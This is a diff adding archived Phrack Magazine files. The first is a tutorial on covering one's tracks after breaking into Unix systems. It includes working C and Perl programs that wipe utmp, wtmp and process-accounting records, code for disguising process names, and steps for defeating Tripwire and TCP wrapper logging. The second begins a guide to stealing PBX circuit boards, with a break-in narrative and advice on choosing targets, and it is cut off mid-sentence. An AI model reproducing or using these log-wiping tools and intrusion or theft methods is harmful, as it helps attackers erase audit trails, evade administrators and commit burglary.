+hosts on the Internet need to be steam-cleaned.
+
+  This is sad.  Especially since you could have had the ability to do the
+washing yourself.  Why bother cracking systems if you leave unauthorized login
+messages on the console for the administrators?  Beats me.
+
+  This article is about hiding your access--the little tricks of the trade
+that keep you unnoticed and hidden from that evil bastard, the system
+administrator.
+
+  I should probably start by explaining exactly where common accounting/log
+files are kept and their roles in keeping/tracking system information.
+
+# Drinking jolt and jerking the logs
+
+  Syslog(3),  The "Big Daddy" of logging daemons, is the master of all system
+accounting and log reporting.  Most system components and applications
+depend on syslogd to deliver the information (accounting, errors, etc.) to
+the appropriate place.  Syslog (syslogd) reads a configuration file
+(/etc/syslog.conf) on startup to determine what facilities it will support.
+
+  Syslog ususally has the following facilities and priorities:
+
+  Facilities: kern user mail daemon auth syslog lpr news uucp
+  Priorities: emerg alert crit err warning notice info debug
+
+  Facilities are the types of accounting that occur and priorities are the
+level of urgency that the facilities will report.  Most facilities are
+divided and logged into separate accounting files.  The common being daemon,
+auth, syslog, and kern.
+
+  Priorities are encoded as a facility and a level.  The facility usually
+describes the part of the system generating the message. Priorities are
+defined in <sys/syslog.h>.
+
+  In order to by-pass or suspend system accounting it is necessary to
+understand how it works.  With syslog, it is important to know how to
+read and determine where accounting files are delivered.  This entails
+understanding how syslog configures itself for operation.
+
+# Reading and understanding /etc/syslog.conf.
+
+  Lines in the configuration file have a selector to determine the
+message priorities to which the line applies and an action.  The action
+fields are separated from the selector by one or more tabs.
+
+  Selectors are semicolon separated lists of priority specifiers.  Each
+priority has a facility describing the part of the system that generated
+the message, a dot, and a level indicating the severity of the message.
+Symbolic names could be used.  An asterisk selects all facilities.  All
+messages of the specified level or higher (greater severity) are
+selected. More than one facility may be selected using commas to separate
+them.  For example:
+
+   *.emerg;mail,daemon.crit
+
+  selects all facilities at the emerg level and the mail and daemon facil-
+ities at the crit level.
+
+  Known facilities and levels recognized by syslogd are those listed in
+syslog(3) without the leading ``LOG_''. The additional facility ``mark''
+has a message at priority LOG_INFO sent to it every 20 minutes (this may be
+changed with the -m flag).  The ``mark'' facility is not enabled by a
+facility field containing an asterisk.  The level ``none'' may be
+used to disable a particular facility.  For example,
+
+   *.debug;mail.none
+
+   Sends all messages except mail messages to the selected file.
+
+   The second part of each line describes where the message is to be logged
+if this line is selected.  There are four forms:
+
+   o A filename (beginning with a leading slash).  The file
+ will be opened in append mode.
+
+   o A hostname preceded by an at sign (``@'').  Selected
+ messages are forwarded to the syslogd on the named host.
+
+   o A comma separated list of users.  Selected messages are
+ written to those users if they are logged in.
+
+   o An asterisk.  Selected messages are written to all
+ logged-in users.
+
+   For example, the configuration file:
+
+   kern,mark.debug /dev/console
+   *.notice;mail.info /usr/spool/adm/syslog
+   *.crit               /usr/adm/critical
+   kern.err  @phantom.com
+   *.emerg  *
+   *.alert  erikb,netw1z
+   *.alert;auth.warning ralph
+
+   logs all kernel messages and 20 minute marks onto the system
+console, all notice (or higher) level messages and all mail system messages
+except debug messages into the file /usr/spool/adm/syslog, and all critical
+messages into /usr/adm/critical; kernel messages of error severity or
+higher are forwarded to ucbarpa.  All users will be informed of any
+emergency messages, the users ``erikb'' and ``netw1z''  will be informed of
+any alert messages, or any warning message (or higher) from the authorization
+system.
+
+   Syslogd creates the file /etc/syslog.pid, if possible, containing a
+single line with its process id; this is used to kill or reconfigure
+syslogd.
+
+# System login records
+
+  There are there basic areas (files) in which system login information is
+stored.  These areas are:
+
+  /usr/etc/wtmp
+  /usr/etc/lastlog
+  /etc/utmp
+
+  The utmp file records information about who is currently using the
+system.  The file is a sequence of entries with the following structure
+declared in the include file (/usr/include/utmp.h):
+
+            struct utmp {
+                  char    ut_line[8];             /* tty name */
+                  char    ut_name[8];             /* user id */
+                  char    ut_host[16];            /* host name, if remote */
+                  long    ut_time;                /* time on */
+            };
+
+  This structure gives the name of the special file associated
+with the user's terminal, the user's login name, and the
+time of the login in the form of time(3C).  This will vary from platform
+to platform.  Since Sun Microsystems ships SunOs with a world writable
+/etc/utmp, you can easily take yourself out of any who listing.
+
+  The wtmp file records all logins and logouts.  A null username
+indicates a logout on the associated terminal.  Furthermore, the terminal
+name `~' indicates that the system was rebooted at the indicated time;
+the adjacent pair of entries with terminal names `|' and `{' indicate the
+system maintained time just before and just after a date command has
+changed the system's idea of the time.
+
+  Wtmp is maintained by login(1) and init(8).  Neither of these programs
+creates the file, so if it is removed or renamed record-keeping is turned off.
+Wtmp is used in conjunction with the /usr/ucb/last command.
+
+  /usr/adm/lastlog is used by login(1) for storing previous login dates, times,
+and connection locations.  The structure for lastlog is as follows:
+
+            struct lastlog {
+                  time_t  ll_time;
+                  char    ll_line[8];
+                  char    ll_host[16];
+            };
+
+  The structure for lastlog is quite simple.  One entry per UID, and it is
+stored in UID order.
+
+  Creating a lastlog and wtmp editor is quite simple.  Example programs are
+appended at the end of this file.
+
+# System process accounting
+
+  Usually, the more security-conscience systems will have process accounting
+turned on which allows the system to log every process that is spawned.
+/usr/adm/acct or /usr/adm/pacct are the usual logfiles that store the
+accounting data.  These files can grow quite large as you can imagine, and
+are sometimes shrunk by other system applications and saved in a compressed
+format as /usr/adm/savacct or something similar.
+
+  Usually, if the accounting file is there with a 0 byte length then you can
+rest assured that they are not keeping process accounting records.  If they
+are however, there are really only two methods of hiding yourself from this
+form of accounting.  One, you can suspend or stop process accounting (
+which is usually done with the "accton" command) or you can edit the existing
+process logfile and "wipe" your incriminating records.
+
+  Here is the common structure for the process accounting file:
+
+  struct  acct
+  {
+        char    ac_comm[10];            /* Accounting command name */
+        comp_t  ac_utime;               /* Accounting user time */
+        comp_t  ac_stime;               /* Accounting system time */
+        comp_t  ac_etime;               /* Accounting elapsed time */
+        time_t  ac_btime;               /* Beginning time */
+        uid_t   ac_uid;                 /* Accounting user ID */
+        gid_t   ac_gid;                 /* Accounting group ID */
+        short   ac_mem;                 /* average memory usage */
+        comp_t  ac_io;                  /* number of disk IO blocks */
+        dev_t   ac_tty;                 /* control typewriter */
+        char    ac_flag;                /* Accounting flag */
+   };
+
+  It is extremely tricky to remove all of your account records since if you
+do use a program to remove them, the program that you run to wipe the
+records will still have a process that will be appended to the logfile
+after it has completed.
+
+  An example program for removing process accounting records is included
+at the end of this article.
+
+  Most sysadmins don't pay real attention to the process logs, since they
+do tend to be rather large and grow fast.  However, if they notice that a
+break-in has occurred, this is one of the primary places they will look for
+further evidence.
+
+  On the other hand, for normal system monitoring, you should be more worried
+about your "active" processes that might show up in a process table listing
+(such as ps or top).
+
+  Most platforms allow the general changing of the process name without having
+any kind of privileges to do so.  This is done with a simple program as noted
+below:
+
+  #include <stdio.h>
+  #include <string.h>
+
+  int main(argc, argv)
+      int argc;
+      char **argv;
+  {
+    char *p;
+
+    for (p = argv[0]; *p; p++)
+        *p = 0;
+
+    strcpy(argv[0], "rn");
+
+    (void) getchar ();  /* to allow you to see that ps reports "rn" */
+    return(0);
+  }
+
+  Basically, this program waits for a key-stroke and then exits.  But,
+while it's waiting, if you were to lookup the process it would show the name
+as being "rn".  You're just actually re-writing the argument list of the
+spawned process.  This is a good method of hiding your process or program
+names ("crack", "hackit", "icmpnuker").  Its a good idea to use this method
+in any "rogue" programs you might not want to be discovered by a system
+administrator.
+
+  If you cant corrupt your process arguments, rename your program to something
+that at least looks normal on the system.  But, if you do this, make sure that
+you don't run the command as "./sh" or "./ping" .. Even this looks suspicious.
+Put your current path in front of your PATH environment variable and avoid
+this mistake.
+
+# Tripping the wire
+
+ That little piss-ant up at Purdue thinks he has invented a masterpiece..
+I'll let his words explain what "Tripwire" is all about.  Then, i'll go over
+some brief flaws in tripwire and how to circumvent it.
+
+---- Tripwire README Introduction
+
+  1.0.  Background
+  ================
+
+     With the advent of increasingly sophisticated and subtle
+ account break-ins on Unix systems, the need for tools to aid in
+ the detection of unauthorized modification of files becomes
+ clear.  Tripwire is a tool that aids system administrators and
+ users in monitoring a designated set of files for any changes.
+ Used with system files on a regular (e.g., daily) basis, Tripwire
+ can notify system administrators of corrupted or tampered files,
+ so damage control measures can be taken in a timely manner.
+
+  1.1.  Goals of Tripwire
+  =======================
+
+
+     Tripwire is a file integrity checker, a utility that compares
+ a designated set of files against information stored in a
+ previously generated database.  Any differences are flagged and
+ logged, and optionally, a user is notified through mail.  When
+ run against system files on a regular basis, any changes in
+ critical system files will be spotted -- and appropriate damage
+ control measures can be taken immediately.  With Tripwire, system
+ administrators can conclude with a high degree of certainty that
+ a given set of files remain free of unauthorized
+ modifications if Tripwire reports no changes.
+
+---- End of Tripwire excerpt
+
+  Ok, so you know what tripwire does.  Yup, it creates signatures for all
+files listed in a tripwire configuration file.  So, if you were to change
+a file that is "tripwired", the proper authorities would be notified and your
+changes could be recognized.  Gee.  That sounds great.  But there are a
+couple of problems with this.
+
+  First, tripwire wasn't made to run continuously (i.e., a change to a system
+binary might not be noticed for several hours, perhaps days.)  This allows
+somewhat of a "false" security for those admins who install tripwire.
+
+  The first step in beating tripwire is to know if the system you are on
+is running it.  This is trivial at best.  The default location where
+tripwire installs its databases are /usr/adm/tcheck or /usr/local/adm/tcheck.
+
+  The "tcheck" directory is basically made up of the following files:
+
+  -rw-------  1 root         4867 tw.config
+  drwxr-----  2 root          512 databases
+
+  The file "tw.config" is the tripwire configuration file.  Basically, it's a
+list if files that tripwire will create signatures for.  This file usually
+consists of all system binaries, devices, and configuration files.
+
+  The directory "databases" contains the actual tripwire signatures for
+every system that is configured in tw.config.  The format for the database
+filenames are tw.db_HOSTNAME.  An example signature entry might look like:
+
+/bin/login 27 ../z/. 100755 901 1 0 0 50412 .g53Lz .g4nrh .g4nrt 0 1vOeWR/aADgc0
+oQB7C1cCTMd 1T2ie4.KHLgS0xG2B81TVUfQ 0 0 0 0 0 0 0
+
+   Nothing to get excited about.  Basically it is a signature encrypted in one
+of the many forms supplied by tripwire.  Hard to forge, but easy to bypass.
+
+   Tripwire takes a long time to check each file or directory listed in
+the configuration file.  Therefore, it is possible to patch or change a system
+file before tripwire runs a signature check on it.  How does one do this?
+Well, let me explain some more.
+
+   In the design of tripwire, the databases are supposed to be kept either on
+a secure server or a read-only filesystem.  Usually, if you would want to
+patch a system binary 9 times out of 10 you're going to want to have root
+access.  Having root access to by-pass tripwire is a must.  Therefore, if you
+can obtain this access then it is perfectly logical that you should be able to
+remount a filesystem as Read/Write.  Once accomplished, after installing your
+patched binary, all you have to do is:
+
+   tripwire -update PATH_TO_PATCHED_BINARY
+
+   Then, you must also:
+
+   tripwire -update /usr/adm/tcheck/databases/tw.db_HOSTNAME
+   (If they are making a signature for the tripwire database itself)
+
+   You'll still be responsible for the changed inode times on the database.
+But that's the risk you'll have to live with.  Tripewire wont detect the change
+since you updated the database.  But an admin might notice the changed times.
+
+# Wrapping up the wrappers
+
+   Ta da.  You got the access.  uh-oh.  What if they are running a TCP
+wrapper?  There are three basic ways they could be running a wrapper.
+
+   1) They have modified /etc/inetd.conf and replaced the daemons they
+      want to wrap with another program that records the incoming
+      hostname and then spawns the correct daemon.
+
+   2) They have replaced the normal daemons (usually in /usr/etc) with
+      a program that records the hostname then launches the correct
+      daemon.
+
+   3) They have modified the actual wrappers themselves to record
+      incoming connections.
+
+  In order to bypass or disable them, you'll first need to know which
+method they are using.
+
+ First, view /etc/inetd.conf and check to see if you see something
+similar to:
+
+  telnet  stream  tcp     nowait  root    /usr/etc/tcpd     telnetd ttyXX
+
+  This is a sure sign that they are running Wietse Venema's tcp_wrapper.
+
+  If nothing is found in /etc/inetd.conf, check /usr/etc and check for any
+abnormal programs such as "tcpd", "wrapd", and "watchcatd".  Finally, if
+nothing is still found, try checking the actually daemons by running
+"strings" on them and looking for logfiles or by using sum and comparing them
+to another system of the same OS that you know is not using a wrapper.
+
+  Okay, by now you know whether or not they have a wrapper installed.  If
+so you will have to now decide what to do with the output of the wrapper.
+You'll have to know where it put the information.  The most common wrapper
+used is tcp_wrapper.  Here is another README excerpt detailing where the
+actually output from the wraps are delivered.
+
+---- Begin of tcp_wrapper README
+
+  3.2 - Where the logging information goes
+  ----------------------------------------
+
+ The wrapper programs send their logging information to the syslog
+ daemon (syslogd). The disposition of the wrapper logs is determined by
+ the syslog configuration file (usually /etc/syslog.conf). Messages are
+ written to files, to the console, or are forwarded to a @loghost.
+
+ Older syslog implementations (still found on Ultrix systems) only
+ support priority levels ranging from 9 (debug-level messages) to 0
+ (alerts). All logging information of the same priority level (or more
+ urgent) is written to the same destination.  In the syslog.conf file,
+ priority levels are specified in numerical form.  For example,
+
+ 8/usr/spool/mqueue/syslog
+
+ causes all messages with priority 8 (informational messages), and
+ anything that is more urgent, to be appended to the file
+ /usr/spool/mqueue/syslog.
+
+ Newer syslog implementations support message classes in addition to
+ priority levels.  Examples of message classes are: mail, daemon, auth
+ and news. In the syslog.conf file, priority levels are specified with
+ symbolic names: debug, info, notice, ..., emerg. For example,
+
+     mail.debug   /var/log/syslog
+
+ causes all messages of class mail with priority debug (or more urgent)
+ to be appended to the /var/log/syslog file.
+
+ By default, the wrapper logs go to the same place as the transaction
+ logs of the sendmail daemon. The disposition can be changed by editing
+ the Makefile and/or the syslog.conf file. Send a `kill -HUP' to the
+ syslogd after changing its configuration file. Remember that syslogd,
+ just like sendmail, insists on one or more TABs between the left-hand
+ side and the right-hand side expressions in its configuration file.
+
+---- End of tcp_wrapper README
+
+  Usually just editing the output and hoping the sysadmin didnt catch the
+the wrap will do the trick since nothing is output to the console
+(hopefully).
+
+# Example programs
+
+  The following are short and sweet programs that give you the ability
+to edit some of the more common logfiles found on most platforms.  Most
+of these are pretty simple to compile, although some might need minor
+porting and OS consideration changes in structures and configurations.
+
+---- Begin of /etc/utmp editor:
+
+/* This program removes utmp entries by name or number */
+
+#include <utmp.h>
+#include <stdio.h>
+#include <sys/file.h>
+#include <sys/fcntlcom.h>
+
+void usage(name)
+char *name;
+{
+    printf(stdout, "Usage: %s [ user ] or [ tty ]\n", name);
+    exit(1);
+}
+
+main(argc,argv)
+int argc;
+char **argv;
+{
+    int fd;
+    struct utmp utmp;
+    int size;
+    int match, tty = 0;
+
+    if (argc!=2)
+       usage(argv[0]);
+
+    if ( !strncmp(argv[1],"tty",3) )
+       tty++;
+
+    fd = open("/etc/utmp",O_RDWR);
+    if (fd >= 0)
+    {
+       size = read(fd, &utmp, sizeof(struct utmp));
+       while ( size == sizeof(struct utmp) )
+       {
+          if ( tty ? ( !strcmp(utmp.ut_line, argv[1]) ) :
+            ( !strcmp(utmp.ut_name, argv[1]) ) )
+          {
+             lseek( fd, -sizeof(struct utmp), L_INCR );
+             bzero( &utmp, sizeof(struct utmp) );
+             write( fd, &utmp, sizeof(struct utmp) );
+          }
+          size = read( fd, &utmp, sizeof(struct utmp) );
+       }
+    }
+    close(fd);
+}
+
+---- End of /etc/utmp editor
+
+---- Begin of /usr/adm/wtmp editor:
+
+/* This program removes wtmp entries by name or tty number */
+
+#include <utmp.h>
+#include <stdio.h>
+#include <sys/file.h>
+#include <sys/fcntlcom.h>
+
+void usage(name)
+char *name;
+{
+    printf("Usage: %s [ user | tty ]\n", name);
+    exit(1);
+}
+
+void main (argc, argv)
+int argc;
+char *argv[];
+{
+    struct utmp utmp;
+    int size, fd, lastone = 0;
+    int match, tty = 0, x = 0;
+
+    if (argc>3 || argc<2)
+       usage(argv[0]);
+
+    if (strlen(argv[1])<2) {
+       printf("Error: Length of user\n");
+       exit(1);
+    }
+
+    if (argc==3)
+       if (argv[2][0] == 'l') lastone = 1;
+
+    if (!strncmp(argv[1],"tty",3))
+       tty++;
+
+    if ((fd = open("/usr/adm/wtmp",O_RDWR))==-1) {
+        printf("Error: Open on /usr/adm/wtmp\n");
+        exit(1);
+    }
+
+    printf("[Searching for %s]:  ", argv[1]);
+
+    if (fd >= 0)
+    {
+       size = read(fd, &utmp, sizeof(struct utmp));
+       while ( size == sizeof(struct utmp) )
+       {
+          if ( tty ? ( !strcmp(utmp.ut_line, argv[1]) ) :
+            ( !strncmp(utmp.ut_name, argv[1], strlen(argv[1])) ) &&
+              lastone != 1)
+          {
+             if (x==10)
+                printf("\b%d", x);
+             else
+             if (x>9 && x!=10)
+                printf("\b\b%d", x);
+             else
+                printf("\b%d", x);
+             lseek( fd, -sizeof(struct utmp), L_INCR );
+             bzero( &utmp, sizeof(struct utmp) );
+             write( fd, &utmp, sizeof(struct utmp) );
+             x++;
+          }
+          size = read( fd, &utmp, sizeof(struct utmp) );
+       }
+    }
+    if (!x)
+       printf("No entries found.");
+    else
+       printf(" entries removed.");
+    printf("\n");
+    close(fd);
+}
+
+---- End of /usr/adm/wtmp editor
+
+---- Begin of /usr/adm/lastcomm editor:
+
+#!/perl
+
+package LCE;
+
+$date = 'Sun Jul  4 20:35:36 CST 1993';
+$title = 'LCE';
+$author = 'Phreak Accident';
+$version = '0.0';
+$copyright = 'Copyright Phreak Accident';
+
+
+#------------------------------------------------------------------------------
+# begin getopts.pl
+
+# Usage: &Getopts('a:bc');  # -a takes arg. -b & -c not. Sets opt_*.
+
+sub Getopts {
+    local($argumentative)=@_;
+    local(@args,$_,$first,$rest,$errs);
+    local($[)=0;
+
+    @args=split(/ */, $argumentative );
+    while(($_=$ARGV[0]) =~ /^-(.)(.*)/) {
+	($first,$rest) = ($1,$2);
+	$pos = index($argumentative,$first);
+	if($pos >= $[) {
+	    if($args[$pos+1] eq ':') {
+		shift(@ARGV);
+		if($rest eq '') {
+		    $rest = shift(@ARGV);
+		}
+		eval "\$opt_$first = \$rest;";
+	    }
+	    else {
+		eval "\$opt_$first = 1";
+		if($rest eq '') {
+		    shift(@ARGV);
+		}
+		else {
+		    $ARGV[0] = "-$rest";
+		}
+	    }
+	}
+	else {
+	    print STDERR "Unknown option: $first\n";
+	    ++$errs;
+	    if($rest ne '') {
+		$ARGV[0] = "-$rest";
+	    }
+	    else {
+		shift(@ARGV);
+	    }
+	}
+    }
+    $errs == 0;
+}
+
+#  end  getopts.pl
+#------------------------------------------------------------------------------
+
+sub Initialize {
+
+  $TRUE = '1';                                  # '1' = TRUE  = '1'
+  $FALSE = '';                                  # ''  = FALSE = ''
+
+  &Getopts('a:u:o:');				# Parse command line options
+  $acct = $opt_a || $ENV{'ACCT'} || '/var/adm/pacct';
+  $user = $opt_u || $ENV{'USER'} || `/bin/whoami` || 'root';
+  $outf = $opt_o || $ENV{'OUTF'} || './.pacct';
+
+  select(STDOUT); $|++;
+  close(I);
+  open(I,'(cd /dev; echo tty*)|');
+  $ttys=<I>;
+  close(I);
+  @ttys = split(/ /,$ttys);
+  for $tty (@ttys) {
+    ($dev,$ino,$mode,$nlink,$uid,$gid,$rdev,$size,
+     $atime,$mtime,$ctime,$blksize,$blocks) = stat("/dev/$tty");
+     $TTY{"$rdev"} = "$tty";
+  }
+  $TTY{'65535'} = 'NoTTY';
+
+# Get passwd info --> id:passwd:uid:gid:name:home:shell
+  close (I);
+#  open(I,"cat /etc/passwd|");	# If you don't run nis...
+  open(I,"ypcat passwd|");
+  while (<I>) {
+    chop;
+    split(/:/);
+    $PASSWD{"$_[$[+2]"}= $_[$[];
+  }
+  $PASSWD{"0"}= 'root';
+
+# Get group info --> id:passwd:gid:members
+  close (I);
+#  open(I,"cat /etc/group|");	# If you don't run nis...
+  open(I,"ypcat group | ");
+  while (<I>) {
+    chop;
+    split(/:/);
+    $GROUP{"$_[$[+2]"}= $_[$[];
+  }
+}
+split(/ /,'Sun Mon Tue Wed Thu Fri Sat');
+for ($x=$[ ; $x<$#_ ; $x++) {
+  $DAY{"$x"} = $_[$x];
+}
+split(/ /,'Error Jan Feb Mar Apr MAy Jun Jul Aug Sep Oct Nov Dec');
+for ($x=$[ ; $x<$#_ ; $x++) {
+  $MONTH{"$x"} = $_[$x];
+}
+
+#------------------------------------------------------------------------------
+
+sub LCE {
+  &Initialize();
+  open(I,"<$acct");
+  close(O);
+  open(O,">$outf");
+  $template='CCSSSLSSSSSSA8';
+  while (read(I,$buff,32)) {
+    ($c1,$c2,$u,$g,$d,$bt,$ut,$st,$et,$o4,$o5,$o6,$c3) =
+      unpack($template,$buff);
+    ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) =
+      localtime($bt);
+    $mon++;
+    $mon = "0$mon" if ($mon < 10);
+    $mday = "0$mday" if ($mday < 10);
+    $hour = "0$hour" if ($hour < 10);
+    $min = "0$min" if ($min < 10);
+    $sec = "0$sec" if ($sec < 10);
+    $tt = localtime($bt);
+    $flags='';
+    if ($c1 & 0001) { $flags .= 'F'; }
+    if ($c1 & 0002) { $flags .= 'S'; }
+    if ($c1 & 0004) { $flags .= 'P'; }
+    if ($c1 & 0010) { $flags .= 'C'; }
+    if ($c1 & 0020) { $flags .= 'K'; }
+    if ($c1 & 0300) { $flags .= 'A'; } 
+    $c3 =~ s/\000.*$//;
+    print STDOUT "$c3	$flags	$PASSWD{$u}/$GROUP{$g}	$TTY{$d}";
+    print STDOUT "	$DAY{$wday} $hour:$min:$sec";
+    if ($PASSWD{$u} eq $user) {
+      print " [ERASED] ";
+    } else {
+      print O pack($template,$c1,$c2,$u,$g,$d,$bt,$ut,$st,$et,$o4,$o5,$o6,$c3);
+    }
+    print "\n";
+  }
+  close(O);
+}
+
+#------------------------------------------------------------------------------
+
+&LCE();
+
+#struct	acct
+#  {
+#  	char	ac_flag;		/* Accounting flag */
+#  	char	ac_stat;		/* Exit status */
+#  	uid_t	ac_uid;			/* Accounting user ID */
+#  	gid_t	ac_gid;			/* Accounting group ID */
+#  	dev_t	ac_tty;			/* control typewriter */
+#  	time_t	ac_btime;		/* Beginning time */
+#  	comp_t	ac_utime;		/* Accounting user time */
+#  	comp_t	ac_stime;		/* Accounting system time */
+#  	comp_t	ac_etime;		/* Accounting elapsed time */
+#  	comp_t	ac_mem;			/* average memory usage */
+#  	comp_t	ac_io;			/* chars transferred */
+#  	comp_t	ac_rw;			/* blocks read or written */
+#  	char	ac_comm[8];		/* Accounting command name */
+#  };
+#  
+#  #define	AFORK	0001		/* has executed fork, but no exec */
+#  #define  ASU 0002            /* used super-user privileges */
+#  #define	ACOMPAT	0004		/* used compatibility mode */
+#  #define	ACORE	0010		/* dumped core */
+#  #define	AXSIG	0020		/* killed by a signal */
+#  #define	ACCTF	0300		/* record type: 00 = acct */
+
+---- End of /usr/adm/lastcomm editor
+
+# All good things must come to an end
+
+  In conclusion, you need to be smarter than the administrator.  Being
+careless can get you busted.  Clean your footprints.  Watch the system.
+Learn new tricks.  AND KEEP ON HACKING!
+
+  Watch for my next article on 50 great system patches that will keep
+your access just the way it is .. illegal.  Yaawhoo.
+
+# End of article
diff --git a/phrack43/15.txt b/phrack43/15.txt
new file mode 100644
index 0000000..7cbf29c
--- /dev/null
+++ b/phrack43/15.txt
@@ -0,0 +1,466 @@
+ 
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Three, File 15 of 27
+
+[** NOTE:  The following file is presented for informational purposes
+           only.  Phrack Magazine takes no responsibility for anyone
+           who attempts the actions described within. **]
+
+
+***************************************************************************
+
+                    Physical Access & Theft of PBX Systems
+
+                             A DSR Tutorial by :
+
+                     CO/der DEC/oder & Cablecast 0perator.
+
+                  (K)opywronged 1993, by Dark Side Research
+
+***************************************************************************
+
+BACKGROUND
+~~~~~~~~~~
+
+July 1989, Mobil Oil Corporation Headquarters -- Fairfax, VA.
+
+     Abundant technology, late hours, and shadows between city lights
+made up the typical environment CO/der DEC/oder repeatedly found
+adventure in.  On one such night in the summer of '89, a reconnaissance
+outing landed him at the offices of Mobil Oil Corp.  The door leading
+from the multi-level parking garage into the foyer was equipped
+with an access-request phone and a square black pad.  The pad was flush
+with the wall, and sported a red LED in its center -- a rather imposing
+device used to read magnetic access cards.  CODEC picked up the phone
+and listened to a couple rings followed by the voice of a security
+guard, "Good evening, security ..."
+     "Evenin', this is Dick Owens with CACI graphics.  I don't have a
+card, but just call upstairs and they'll verify."
+     "Hold on, sir ..."
+     Kastle Security's verification call registered as a sudden 90 VAC
+spike on Cablecast 0perator's meter.  Clipped on the blue and white pair
+of CACI's incoming hunt group, Cable picked up on his TS-21:
+     "Hello?"
+     "This is Kastle Security.  We've got a Dick Owens downstairs
+requesting access."
+     "Yeah Sure.  Let him in please."
+     The security man took Codec off hold, "Okay sir, what entrance are
+you at?"
+     "Garage level one."
+     The door clicked, and in went the hacker-thief -- grinning.
+Another lock at the end of a hallway also hindered access, but a
+screwdriver, placed between door and frame, removed the obstruction with
+a quickly applied force.
+     CACI was a graphics outfit sharing the same building with Mobil.
+After a perusal through its desks and darkened corridors turned up a
+cardkey for later use, Codec -- pausing casually along the way at the
+drunking fountain -- made his way to the opposite end of the hallway and
+into Mobil's mail receiving room.  In contrast to elsewhere in the
+building, this room was chilly -- as if heavy air conditioning was
+nearby.  There was also a faint roar of fans to enhance this notion.
+And behind a countertop in the direction of the noise, a split door could
+be seen through which mail and parcels were passed during business
+hours.  Hardly an obstacle, he was on the other side in an instant.
+This "other side" was no less than a gateway to nirvana.  At first he
+began taking in the sight of a mini-computer, console, and mass storage
+devices, but his eyes were virtually pulled to the giant on his left.
+It was the largest and most impressive PBX he had yet seen; a label
+above the five gargantuan, interconnected cabinets read, "AT&T SYSTEM
+85."  The hacker's heart raced -- he wanted to explore, control, and own
+the switch all at once.  Within seconds his gloved hands caressed the
+cabinets while his hungry eyes scanned circuit pack descriptors, mouth
+agape.  Codec grabbed some manuals, jotted down numbers to a modem
+stack, and reluctantly departed.  A week later, he stole the switch.
+     To the Dark Side Research group, the System 85 would be worth
+approximately $100,000 -- but to Mobil, the system was worth at least
+six times that figure.  In its entirety it was more valuable, but DSR
+was only concerned with the guts; the digital circuitry of the system.
+When Codec reentered the building the following week, he was wearing a
+VOX headset attached to a hand-held 2-meter band (HAM) radio.  This was
+strapped to his chest except for the rubber-whip antenna which protruded
+out of a hole in his jacket.  His awestruck, gleeful countenance from
+a week prior had been replaced by a more grave expression, and the
+moisture now on his body was no longer from unconscious salivation
+but due to the sweat of anticipation and rapid movement.
+     "Phase one complete," he spoke into the boom mic in front of his
+face.
+     "Roger Nine-Two.  Quit breathing on the VOX or adjust sensitivity,
+over."
+     "Roger Nine-Three.  Entering heavy EMI area," Codec acknowledged to
+one of the lookouts.
+     Steps were retraced through the mail room, where several empty
+boxes marked "U.S. Mail" and a dolly were conveniently stored.  The
+System 85 was shut down, cabinet by cabinet, as most of the circuit
+boards were hastily removed and boxed.  Seven boxes were filled,
+requiring two trips with the dolly to a side door.
+     "All units: ready for docking."
+     "Roger Nine-Two.  Standby.  Nine-Three, okay for docking?"
+     "Step on it, over ..."
+     A Ford Escort with its hatch open raced up to where Codec and the
+boxes stood.  Within fifteen minutes the circuit packs were unloaded in
+a public storage unit.  Within half an hour, CO/dec DEC/oder, Cablecast
+0perator, and the remainder of the night's crew were filling up with
+doughnuts of the nearby 7-11, observing local law enforcement doing the
+same.
+
+APRIL 1993: Security memorandum broadcast from wrq.com -- Internet
+
+     "We've all heard of toll fraud as a way to steal telecommunications
+resources.  Now the ante has been escalated.  I've heard of a
+company on the East Coast that was having some minor troubles with their
+PBX.  A technician showed up at the door and asked directions to the PBX
+closet.  The company showed this person the way without checking any
+credentials, and about five minutes later the phones went completely
+dead.  They went up to the PBX closet and found that several boards from
+the PBX had been removed and that the 'repairman' had departed."
+
+
+     The theft of PBX circuit boards is a novel idea and seldom heard
+of, but -- as made apparent above -- it does occur.  In the used PBX
+scene, often referred to as the "secondary" or "grey" market, there is
+always a demand for circuit packs from a wide variety of PBXs.  The
+secondhand PBX industry grew from $285 million in 1990 to $469 million
+in 1992 -- despite the recession.
+     The essence of any PBX is a rack or multiple racks of circuit
+cards/boards/packs, with an average grey market value of anywhere from
+$50 to $2000 each.  The cards are lightweight, small in size, and can
+even withstand a moderate dose of abuse.  Transport of misappropriated
+circuit boards is done without risk -- under and police scrutiny, a box
+of these looks like a mere pile of junk (or senior engineering project)
+in the trunk of your car.  Furthermore, the serial numbers on the boards
+are seldom, if ever, kept track of individually, and these can be
+removed or "replaced" in any case.  Unlike computer equipment or
+peripherals, PBX cards are extremely safe, simple, and non-proprietary
+components to handle -- even in quantity.
+     Although you may wish to physically access PBXs for reasons other
+than theft, it will be assumed here that monetary gain is your motive.
+In either case, this introductory file makes it clear that access can be
+achieved with varying levels of ease.  A PBX theft should be thought of
+in terms of two phases:  reconnaissance and extraction.  Recon involves
+finding and selecting prime targets.  Extraction is the actual theft of
+the system.  Both phases can be completed through "office building
+hacking," a wide variety of deception, breaking and entering, social
+engineering, and technical skills.
+
+Phase I : Reconnaissance
+
+     PBXs are found where people's communications needs warrant the
+capabilities of such a system -- offices, schools, hotels, convention
+centers, etc.  The PBXs we will concert ourselves with in this discourse
+however are those located in shared or multiple-leased office
+structures; the "typical" office buildings.  The typical office building
+has enough floors to require an elevator, some parking space, a lobby,
+and a company directory (Because it is shared by more than one
+business).  Companies that occupy an entire building by  themselves are
+generally too secure to be worthwhile targets.
+     Tenant companies in the typical building lease all different size
+office space -- some rent only 300 sq. ft., others take up entire
+floors.  Those that use half a floor or more usually meet the criteria
+for PBX ownership.  Obviously, the larger the firm's office at that
+site, the greater its PBX will be, so those business spread out over
+several floors will have the most valuable systems.  This is not always
+an overwhelming factor in determining a target however.  The smaller
+systems are often easier to get at -- and ultimately to remove --
+because they tend to be located in utility closets off publicly
+accessible hallways as opposed to within a room inside an office space.
+Those closets, sometimes labeled "telephone" and even unlocked, will be
+found one or two per floor!  Other closets may exist for electrical
+equipment, HVAC, plumbing, janitorial supplies, or for a combination of
+these uses in addition to telephone service.
+     A phone closet is easily distinguishable whether or not a switch or
+key system is present.  A web of low-voltage (22 AWG), multi-colored
+wiring will be channelled and terminated on a series of white "66"
+blocks mounted on the wall.  These blocks are a few inches wide, and
